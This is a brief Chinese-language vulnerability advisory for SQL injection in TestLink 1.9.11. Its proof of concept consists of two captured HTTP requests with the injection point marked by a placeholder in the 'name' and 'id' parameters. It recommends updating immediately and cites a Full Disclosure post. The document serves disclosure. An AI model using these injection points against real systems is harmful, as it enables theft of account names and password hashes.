簡介

TestLink 多處 SQL Injection 可讓攻擊者獲取所有使用者帳號及密碼 hash。

Warning

• Ver. 1.9.11

PoC

─────────────────────────────────────────────

POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
Cookie: [...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter

─────────────────────────────────────────────

POST /testlink/lib/events/eventinfo.php HTTP/1.1
Content-Length: 6
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: 192.168.56.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
DNT: 1
Connection: close
Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1;
ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}

id=123<SQL Injection>

結論

立即更新 。

參考資料：http://seclists.org/fulldisclosure/2014/Oct/11